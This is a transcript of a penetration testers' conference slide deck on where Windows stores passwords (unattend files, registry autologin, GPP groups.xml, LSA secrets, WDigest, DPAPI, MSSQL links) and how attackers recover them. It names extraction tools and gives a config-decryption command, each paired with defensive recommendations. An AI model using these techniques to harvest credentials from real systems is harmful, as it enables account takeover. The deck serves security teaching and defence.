Your SlideShare is downloading. ×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Extracting Credentials From Windows

134
views

Published on

Published in: Technology

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
134
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Like what you hear? Tweet it using: #Sec360
  • 2. INTRODUCTIONS Who are we? • Scott Sutherland • Antti Rantasaari What do we do? • Network and application penetration testing at NetSPI
  • 3. GOAL Provide a basic understanding of how passwords can be exposed on Windows systems • What are the controls? • What are their limitations? • How can we reduce risk?
  • 4. OVERVIEW How to steal credentials from Microsoft technologies: • Password Storage • Cleartext passwords • Encrypted passwords • Password hashes • Authentication tokens
  • 5. PASSWORD STORAGE • Hashed passwords  Used when cleartext password is not required later  No key required, hashing process can’t be reversed • Encrypted passwords  Used when cleartext password will be required later  Requires key to decrypt password  Requires key management • Encoded passwords  Should not be used to protect passwords  No key required to decode password • Cleartext passwords – Don’t do that!
  • 6. CLEARTEXT PASSWORDS Why does it matter if passwords are stored or transmitted in cleartext? • Vulnerabilities can provide read-only access to:  OS files, backup files, and files shares  Network traffic • Passwords can then be used to access:  Systems  Applications / Databases  Sensitive information
  • 7. CLEARTEXT PASSWORDS Why does it matter if passwords are stored or transmitted in cleartext? • Vulnerability examples:  File traversal  Local file includes  Excessive privileges on shares  ARP MITM
  • 8. CLEARTEXT PASSWORDS Where can I find cleartext passwords? • Mapped network drives – User files • Configuration files • Windows Registry • Active Directory • Websites • Script files • Log files
  • 9. CLEARTEXT PASSWORDS Mapped Network Drives • Users have access to a ton of files shares • File shares often have bad ACLs • Users love to store password in files  xls files  doc files  txt file  etc…
  • 10. CLEARTEXT PASSWORDS Mapped Network Drives • Easy to find passwords using:  Find  Grep  Spider  Notepad++  Etc…
  • 11. CLEARTEXT PASSWORDS Mapped Network Drives Recommendations • Review for password on at regular intervals • Periodic audits of access controls on shares • User awareness training • Use of proper password storage
  • 12. CLEARTEXT PASSWORDS Configuration Files • Sometimes config files are only accessible to administrators • Most config files are accessible to all users  Bad ACLs  Access to backups
  • 13. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Files created to support the automation of large scale image roll outs • Configuration settings • Local and domain credentials
  • 14. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Files can be read by ANY user on the system • There are many places they can be stored and used
  • 15. CLEARTEXT PASSWORDS Configuration Files – Sysprep http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx Type Location Registry HKLMSystemSetup!UnattendFile File %WINDIR%PantherUnattend File %WINDIR%Panther File Removable read/write media in order of drive letter, at the root of the drive. File Removable read-only media in order of drive letter, at the root of the drive. File windowsPE and offlineServicing passes: Sources directory in a Windows distribution All other passes: %WINDIR%System32Sysprep File %SYSTEMDRIVE%
  • 16. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Most of the time they are stored with no protection… http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 17. CLEARTEXT PASSWORDS Unattend and Sysprep Files http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx Unattend.xml Example - Cleartext …[snip]… <OOBE> <HideEULAPage>true</HideEULAPage> <NetworkLocation>Work</NetworkLocation> <ProtectYourPC>1</ProtectYourPC> <SkipMachineOOBE>true</SkipMachineOOBE> <SkipUserOOBE>true</SkipUserOOBE> </OOBE> <UserAccounts> <AdministratorPassword> <Value>Passw0rd</Value> <PlainText>true</PlainText> </AdministratorPassword> </UserAccounts> </component> …[snip]…
  • 18. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Sometimes they are Base64 encoded… http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 19. CLEARTEXT PASSWORDS Unattend and Sysprep Files http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx Unattend.xml Example – Base64 Encoded …[snip]… <OOBE> <HideEULAPage>true</HideEULAPage> <NetworkLocation>Work</NetworkLocation> <ProtectYourPC>1</ProtectYourPC> <SkipMachineOOBE>true</SkipMachineOOBE> <SkipUserOOBE>true</SkipUserOOBE> </OOBE> <UserAccounts> <AdministratorPassword> <Value>UGFzc3cwcmQ=</Value> <PlainText>true</PlainText> </AdministratorPassword> </UserAccounts> </component> …[snip]…
  • 20. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Sometimes they are Base64 encoded… Base64 Encoding != Encryption http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 21. CLEARTEXT PASSWORDS Unattend and Sysprep Files http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 22. CLEARTEXT PASSWORDS Configuration Files – Sysprep Recommendations • Configure roll out scripts to remove the sysprep answer files like unattend.xml • Additional notes:  Prevent remote logins by local administrators  Manage systems with domain groups
  • 23. CLEARTEXT PASSWORDS Configuration Files – Web.config • Used to store IIS web application configurations • Often contain database passwords • By default passwords are cleartext
  • 24. CLEARTEXT PASSWORDS Configuration Files – Web.config • Typically stored at the webroot for each IIS site • Usually can be read by all users on the system
  • 25. CLEARTEXT PASSWORDS Configuration Files – Web.config Recommendations • Encrypt passwords stored in web.config aspnet_regiis.exe -pef "connectionStrings" c:webapp • Additional notes:  Configure strong ACLs on file system
  • 26. CLEARTEXT PASSWORDS Configuration Files – Web.config Recommendations
  • 27. CLEARTEXT PASSWORDS Basic Authentication • Simple way to implement IIS authentication • Uses Base64 encoding, NOT ENCRYPTION • Credentials can be captured from network traffic over HTTP, or via man-in-the-middle over HTTPS
  • 28. CLEARTEXT PASSWORDS Basic Authentication • Basic authentication over SSL is not that bad • Very common to see it used over unencrypted HTTP connections
  • 29. CLEARTEXT PASSWORDS Basic Authentication • Base64 Encoded bmV0c3BpOlZlcnlTdHJvbmdBbmRIYXJkVG9HdW Vzc1Bhc3N3b3Jk • Easily decoded Base64 netspi:VeryStrongAndHardToGuessPassword Microsoft ActiveSync (iPhone, etc.)
  • 30. CLEARTEXT PASSWORDS Basic Authentication Recommendations • Basic Auth is simple, but not often necessary • Replace with Integrated Authentication to enforce authentication handshake • Additional notes:  Integrated Authentication can still be exploited, but it’s not as easy
  • 31. CLEARTEXT PASSWORDS Windows Registry • Many applications store passwords in cleartext • Easy to search for common strings to find passwords • Windows also stores some passwords in cleartext  Autologin username and password
  • 32. CLEARTEXT PASSWORDS Windows Registry - AutoLogin • Used by many kiosk and POS systems • Often stores autologin credentials in [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "AutoAdminLogon"="1" "DefaultUserName"=“autoadmin" "DefaultPassword"=“!PassW0rd!" "DefaultDomainName"=“acme"
  • 33. CLEARTEXT PASSWORDS Windows Registry - AutoLogin
  • 34. CLEARTEXT PASSWORDS Windows Registry - AutoLogin Recommendations • Only use autologin when necessary • If required, store credentials encrypted in LSASecrets • Additional notes:  The encrypted password can be recovered with administrative access to the system http://technet.microsoft.com/en-us/sysinternals/bb963905.aspx
  • 35. CLEARTEXT PASSWORDS Active Directory • User Comments • Custom properties
  • 36. CLEARTEXT PASSWORDS Active Directory Recommendations • Don’t store cleartext passwords in active directory • Audit Active Directory periodically for comments and custom objects that may contain passwords
  • 37. ENCRYPTED PASSWORDS How is it possible to decrypt passwords protected by Microsoft technologies? Key Point: If an application or OS can decrypt it, so can an attacker! …sometimes administrator access is required.
  • 38. ENCRYPTED PASSWORDS How is it possible to recover passwords encrypted by Microsoft technologies? • Calling native OS and application functions • Recovering encryption keys  From same system as the protected data  From external systems like HSMs • Use the keys and correct algorithm to recover protected data
  • 39. ENCRYPTED PASSWORDS Groups.xml • Windows AD Group Policy Preferences allow setting passwords for local accounts on domain systems
  • 40. ENCRYPTED PASSWORDS Groups.xml • For that to work the password has to be sent to the user’s system • Groups.xml is pulled down from the SYSVOL share on the DC • SYSVOL and Groups.xml are accessible to all domain users and computer accounts
  • 41. ENCRYPTED PASSWORDS • Updating a user results in groups.xml file creation
  • 42. ENCRYPTED PASSWORDS • Passwords in groups.xml are AES256 encrypted and base64 encoded • To apply the password locally, client has to decrypt it • To enable this, encryption key is stored on clients • But MS released the STATIC key in an MSDN article; now anyone can decrypt the password! http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70- 1f2fa45dd4be.aspx#endNote2
  • 43. ENCRYPTED PASSWORDS • Groups.xml password decrypted with a simple PowerShell script https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get- GPPPassword.ps1
  • 44. ENCRYPTED PASSWORDS Groups.xml Recommendations • Microsoft does not recommend setting passwords via Group Policy so it’s not a good idea to do that • Access to groups.xml cannot be prevented for domain users so it should not be used
  • 45. ENCRYPTED PASSWORDS LSASecrets • Used to store all kinds of passwords  Service accounts  Autologin  Applications
  • 46. ENCRYPTED PASSWORDS LSASecrets • Passwords are stored encrypted in the registry HKLM:SECURITYPolicySecrets • Only viewable by LocalSystem • But…administrators can become LocalSystem
  • 47. ENCRYPTED PASSWORDS LSASecrets sdf Administrator Access LocalSystem Access
  • 48. ENCRYPTED PASSWORDS LSASecrets • Additional information is also required from the subkeys of HKLM:SECURITYPolicy
  • 49. ENCRYPTED PASSWORDS LSASecrets • Use native API methods to decrypt the secrets LsaRetrievePrivateData LsaStorePrivateData LsaOpenPolicy LsaNtStatusToWinError LsaClose LsaFreeMemory
  • 50. ENCRYPTED PASSWORDS LSASecrets – Service Account Example
  • 51. ENCRYPTED PASSWORDS WDigest • Designed for use protocols that require a cleartext password to authenticate:  Hypertext Transfer Protocol (HTTP)  Simple Authentication Security Layer (SASL) exchanges http://technet.microsoft.com/en-us/library/cc778868(v=ws.10).aspx http://www.slideshare.net/gentilkiwi
  • 52. ENCRYPTED PASSWORDS WDigest • Stores passwords for interactive logins (like RDP) encrypted in the lsass.exe process • Depending on secret size and OS version RC4, DES, or AES is used http://technet.microsoft.com/en-us/library/cc778868(v=ws.10).aspx http://www.slideshare.net/gentilkiwi
  • 53. ENCRYPTED PASSWORDS WDigest • After injecting into the lsass.exe process or importing initialized keys via lsasrv.dll… • Native functions from lsasrv.dll can be used to decrypt the passwords – namely… LsaUnprotectMemory http://www.slideshare.net/gentilkiwi http://msdn.microsoft.com/en-us/library/windows/desktop/ff714510(v=vs.85).aspx
  • 54. ENCRYPTED PASSWORDS WDigest • Tools like Mimikatz and WCE can be used to recover cleartext passwords http://www.slideshare.net/gentilkiwi http://msdn.microsoft.com/en-us/library/windows/desktop/ff714510(v=vs.85).aspx
  • 55. ENCRYPTED PASSWORDS WDigest Recommendations • Use smartcard or biometrics when possible • Use network logins instead of interactive logs when possible • Use unprivileged accounts when possible • Do not provide admin / system / debug privileges to users http://www.slideshare.net/gentilkiwi
  • 56. ENCRYPTED PASSWORDS DPAPI • Windows Data Protection API (DPAPI) • Standard / easy way on Windows to encrypt and decrypt data • DPAPI used by many applications  IE, Chrome, Skype, EFS certificates, WEP / WPA keys, RDP passwords, Credential Manager • Data protection in memory or on disk
  • 57. ENCRYPTED PASSWORDS DPAPI – stored data • Two protection scopes: CurrentUser or LocalMachine • Protection scope determines the encryption keys  CurrentUser scope uses keys protected by current user’s password  LocalMachine scope uses keys on the system • Additional entropy added to strengthen protection
  • 58. ENCRYPTED PASSWORDS DPAPI - internals • Largely undocumented by Microsoft – just the API calls are fully documented • DPAPI has been reversed and offline decryption tools have been released http://passcape.com/index.php?section=blog&cmd=details&id=20#11 http://www.elie.net/publication/reversing-dpapi-and-stealing- windows-secrets-offline#.U3BnB_ldWDs
  • 59. ENCRYPTED PASSWORDS MSSQL Links - Background • Microsoft SQL Server allows users to create links to external data sources, typically to SQL Servers • Links can be configured to use SQL server credentials • Cleartext passwords are needed to connect to linked servers – password hashing cannot be used
  • 60. ENCRYPTED PASSWORDS MSSQL Links - Background
  • 61. ENCRYPTED PASSWORDS MSSQL Links – Password Storage • Linked server passwords stored in the database – only accessible using DAC • Passwords stored in pwdhash column even though hashing is not used • Passwords encrypted but SQL Server must have the key
  • 62. ENCRYPTED PASSWORDS MSSQL Links – Password Storage
  • 63. ENCRYPTED PASSWORDS MSSQL Links – Service Master Key • SQL Server has a Service Master Key which is encrypted using DPAPI • Additional entropy is stored in the registry • Service Master Key is “the root of the SQL Server encryption hierarchy”, used to encrypt linked server passwords too
  • 64. ENCRYPTED PASSWORDS MSSQL Links – Service Master Key
  • 65. ENCRYPTED PASSWORDS MSSQL Links – Passwords Decryption • Decrypt Service Master Key using DPAPI • Extract encrypted password from database • Remove metadata from the password • Decrypt password using Service Master Key (either 3DES or AES depending on version)
  • 66. ENCRYPTED PASSWORDS MSSQL Links – Passwords Decrypted
  • 67. ENCRYPTED PASSWORDS MSSQL Links Recommendations • Best practice is to use Windows authentication only – do not enable SQL server authentication • Configure linked servers to use current execution context rather than saved credentials
  • 68. ENCRYPTED PASSWORDS Credential Manager / Vault • Credential Manager is intended to be a secure way to store password • Can be used for Windows credentials, browser credentials, application credentials • Each user has their own Vault – user can store own passwords
  • 69. ENCRYPTED PASSWORDS Credential Manager / Vault • Cleartext credentials needed to connect to remote systems – thus passwords in Cred Manager are encrypted, not hashed. • DPAPI used to encrypt passwords
  • 70. ENCRYPTED PASSWORDS Credential Manager / Vault
  • 71. ENCRYPTED PASSWORDS Credential Manager / Vault • Credential manager password decryption using Cain http://www.oxid.it/
  • 72. ENCRYPTED PASSWORDS Credential Manager / Vault Recommendations • Stored passwords always a security risks • Consider disabling Credential Manager using group policies
  • 73. ENCRYPTED PASSWORDS Wireless • Wireless connections with pre-shared keys have to store the passwords • Passwords encrypted using DPAPI • User or SYSTEM can access the stored passwords • Multiple tools to extract wireless credentials, including Metasploit
  • 74. ENCRYPTED PASSWORDS Wireless
  • 75. ENCRYPTED PASSWORDS Wireless Metasploit module: post/windows/wlan/wlan_profile
  • 76. ENCRYPTED PASSWORDS Wireless Recommendations • Do not use pre-shared keys • Configure corporate wireless to use WPA2- Enterprise (integrated authentication)
  • 77. ENCRYPTED PASSWORDS Web.config and ApplicationHost.config • IIS application configuration files • Web.config = application level • ApplicationHost.config = server level  Application pool credentials  Windows credentials used for directory access … but they can also be decrypted
  • 78. ENCRYPTED PASSWORDS Web.config and ApplicationHost.config • Early saw this aspnet_regiis.exe -pef "connectionStrings" c:webapp
  • 79. ENCRYPTED PASSWORDS Web.config and ApplicationHost.config • No surprise that local administrators can do this: aspnet_regiis.exe -pdf "connectionStrings" c:webapp
  • 80. HASHED PASSWORD Why do should I care if someone steals my password hashes if I have complexity enabled? • #1 Reason: Password hashes can be replayed and used to authenticate without knowledge of the password
  • 81. HASHED PASSWORD Why do should I care if someone steals my password hashes if I have complexity enabled? • #2 Reason: Password hashes can cracked at lighting speeds using modern hardware and software
  • 82. PASSWORD HASHES On the System • Local / Domain LM hashes • Local / Domain NTLM hashes • Domain MS-CACHEv2 On the Network • Local / Domain NetLM • Local / Domain NetNTLM
  • 83. PASSWORD HASHES Can be dumped with a billion different hacker tools!
  • 84. DO I REALLY NEED PASSWORDS? Short answer is NO
  • 85. DO I REALLY NEED PASSWORDS? • SMB relay • Pass-the-hash • Stealing authentication tokens • Crawling database links • Process migration • Generating golden tickets
  • 86. CONCLUSIONS • Protecting passwords is really, really hard if an attacker has admin rights to you system • Don’t store passwords in clear text – Anywhere! • Only use encryption when the cleartext passwords need used later • Use HSM to protect keys used to encrypt data • Use strong salted hashes to protect passwords • Enforce least privilege everywhere – networks, servers, applications…EVERYWHERE
  • 87. NETSPI REFERENCES • NetSPI blog: http://www.netspi.com/blog • NetSPI github: https://github.com/netspi • Scott github: https://github.com/nullbind • NetSPI slideshare: http://slideshare.com/netspi • Scott slideshare: http://slideshare.com/nullbind • Scott twitter: @_nullbind

×